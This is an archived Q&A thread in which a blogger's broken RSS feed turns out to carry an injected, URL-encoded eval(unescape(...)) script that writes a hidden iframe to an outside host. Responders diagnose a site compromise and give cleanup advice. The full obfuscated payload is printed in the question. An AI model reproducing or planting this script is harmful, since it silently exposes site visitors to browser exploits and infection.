tags:

views:

57

answers:

1
Q: 

RSS won't update

My feed is broken: Feed Validator says this portion is the problem. Any thoughts?

]]>content:encoded> 

wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>

slash:comments>2/slash:comments>

/item>

/channel>

/rss>

script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
+4  A:  
<script language="javascript">eval(unescape("%64%6F%63...

You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.

You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your your own [virtual] server you will need to check that the server itself hasn't been rooted.

(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)

bobince  2010-02-05 12:28:40
That doesn't sound good. I use wordpress and godaddy. I stopped using FTP months ago after my trial expired. I have NO idea what to do about this. I would LOVE to hire you to help me. Interested?
Daniel  2010-02-05 12:32:33
Some pointers on what to do: http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html
Pekka  2010-02-05 12:39:47
@Daniel: Well let's try to solve it here first! How have you been connecting to update the site since stopping with FTP? (eg. SFTP? With the same password as FTP used? Is your password strong, or a simple word-like password?) Try running multiple virus checkers over your client machine and any others used to update the site. Judging by the position it has inserted the `<script>`, it looks like it's a server account compromise that has altered the `.php` files, and not simply a database injection. But re-download the PHP from the hacked server to check that they have been inserted there.
bobince  2010-02-05 14:04:31
(if not, there must be a more complicated Apache-level compromise, but I can't see anyone else's sites on that Godaddy server with the exploit code, so I don't think the server itself is compromised at the moment.)
bobince  2010-02-05 14:05:17
to update the site I just throw in posts through wp-admin. I haven't made any real changes since 4 months ago.I will run the virus checkers. The password was very strong. Either it was random characters they gave me or my usual password, which is a nice combination of everything and impossible to guess.The server...goes through godaddy, right?How do I download the PHP? I'm not clear about the server stuff. I think you mean by going through FTP, but I have to download cuteFTP or something similar first, correct?Please check back, I won't give up and want to try first. thanks!
Daniel  2010-02-05 16:54:06
Oh, so you don't administer it at all? Who's responsible for keeping Wordpress and any other software up to date on the server? (I see you're are running the latest WP 2.9.1, so someone must be!) You can access FTP using plain old Windows Explorer, just type `ftp://[email protected]` into the address bar. You can also try WinSCP, which does plain FTP as well as SFTP; in this century really nobody should be using unencrypted FTP, but still there are some hosting outfits that don't support it, sadly.
bobince  2010-02-05 18:19:26

related questions

Add RSS to any website?
What is the best .Net library to handle feeds (Atom+RSS)
Using Yahoo! Pipes
PHP - RSS builder
Whats the best windows tool for merging RSS Feeds?
How do you customize the RSS feeds in SharePoint
What are your favourite programming-related RSS feeds?
Which library should I use to generate RSS in Common Lisp?
How can I import a raw RSS feed in C#?
What Feed Reader libraries for Java are best?
How To Discover RSS Feeds for a given URL
How to build large/busy RSS feed
ASP.Net RSS feed
Recommended Python RSS/Atom feed generator?
Rss feed for game programmer?
Programatically determine how many Comments a blog post has
merge rss feeds
RSS Feed Library for (Unmanaged) C++
SelectNodes not working on stackoverflow feed
Best Practices for AS3 XML Parsing
RSS/Atom for professional use
SSRS - RSS Feeds
Why Are People Still Creating RSS Feeds?
RSS Feeds in ASP.NET MVC
Monitor a specific RSS